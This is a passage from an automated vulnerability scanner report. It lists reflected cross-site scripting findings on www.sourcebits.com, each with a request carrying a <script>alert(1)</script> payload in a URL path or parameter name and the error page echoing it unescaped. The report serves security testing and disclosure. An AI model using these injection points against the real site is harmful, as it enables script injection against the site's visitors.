Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d594"><script>alert(1)</script>b327dcd3bcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js5d594"><script>alert(1)</script>b327dcd3bcd/modernizr-1.7.min.js?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js5d594"><script>alert(1)</script>b327dcd3bcd/modernizr-1.7.min.js?1305313043" />
...[SNIP]...

1.113. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4d9"><script>alert(1)</script>67cda7b89b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/modernizr-1.7.min.js2b4d9"><script>alert(1)</script>67cda7b89b2?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/modernizr-1.7.min.js2b4d9"><script>alert(1)</script>67cda7b89b2?1305313043" />
...[SNIP]...

1.114. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10e6e<script>alert(1)</script>40524db9a4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/modernizr-1.7.min.js10e6e<script>alert(1)</script>40524db9a4a?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/modernizr-1.7.min.js10e6e<script>alert(1)</script>40524db9a4a?1305313043</h2>
...[SNIP]...

1.115. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/sb_announce.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d459d"><script>alert(1)</script>aa35a7146b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd459d"><script>alert(1)</script>aa35a7146b7/sb_announce.js?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsd459d"><script>alert(1)</script>aa35a7146b7/sb_announce.js?1305558390" />
...[SNIP]...

1.116. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/sb_announce.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1a8b<script>alert(1)</script>d1681c560bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsb1a8b<script>alert(1)</script>d1681c560bc/sb_announce.js?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsb1a8b<script>alert(1)</script>d1681c560bc/sb_announce.js?1305558390</h2>
...[SNIP]...

1.117. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/sb_announce.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de108"><script>alert(1)</script>3e8c044e162 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/sb_announce.jsde108"><script>alert(1)</script>3e8c044e162?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/sb_announce.jsde108"><script>alert(1)</script>3e8c044e162?1305558390" />
...[SNIP]...

1.118. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/sb_announce.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e342<script>alert(1)</script>3ffb94f2a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/sb_announce.js4e342<script>alert(1)</script>3ffb94f2a72?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/sb_announce.js4e342<script>alert(1)</script>3ffb94f2a72?1305558390</h2>
...[SNIP]...

1.119. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67a4d<script>alert(1)</script>009e98f8d34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js67a4d<script>alert(1)</script>009e98f8d34/ttSelectbox-services.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js67a4d<script>alert(1)</script>009e98f8d34/ttSelectbox-services.js?1265536927</h2>
...[SNIP]...

1.120. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0e7"><script>alert(1)</script>2cbab05de96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js1d0e7"><script>alert(1)</script>2cbab05de96/ttSelectbox-services.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js1d0e7"><script>alert(1)</script>2cbab05de96/ttSelectbox-services.js?1265536927" />
...[SNIP]...

1.121. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a42c8<script>alert(1)</script>e7284ffa150 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ttSelectbox-services.jsa42c8<script>alert(1)</script>e7284ffa150?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/ttSelectbox-services.jsa42c8<script>alert(1)</script>e7284ffa150?1265536927</h2>
...[SNIP]...

1.122. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3abc5"><script>alert(1)</script>ef22e1f5765 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ttSelectbox-services.js3abc5"><script>alert(1)</script>ef22e1f5765?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/ttSelectbox-services.js3abc5"><script>alert(1)</script>ef22e1f5765?1265536927" />
...[SNIP]...

1.123. http://www.sourcebits.com/mac [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /mac

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a861c<script>alert(1)</script>bb9ac288c30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /maca861c<script>alert(1)</script>bb9ac288c30 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/maca861c<script>alert(1)</script>bb9ac288c30</h2>
...[SNIP]...

1.124. http://www.sourcebits.com/mac [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /mac

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f2c7<script>alert(1)</script>235db48bf8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac?7f2c7<script>alert(1)</script>235db48bf8d=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:26 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/mac?7f2c7<script>alert(1)</script>235db48bf8d=1</h2>
...[SNIP]...

1.125. http://www.sourcebits.com/mobile [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /mobile

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6eeec<script>alert(1)</script>5b92a5ac7f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile6eeec<script>alert(1)</script>5b92a5ac7f1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/mobile6eeec<script>alert(1)</script>5b92a5ac7f1</h2>
...[SNIP]...

1.126. http://www.sourcebits.com/mobile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8e883<script>alert(1)</script>e396100ca93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile?8e883<script>alert(1)</script>e396100ca93=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
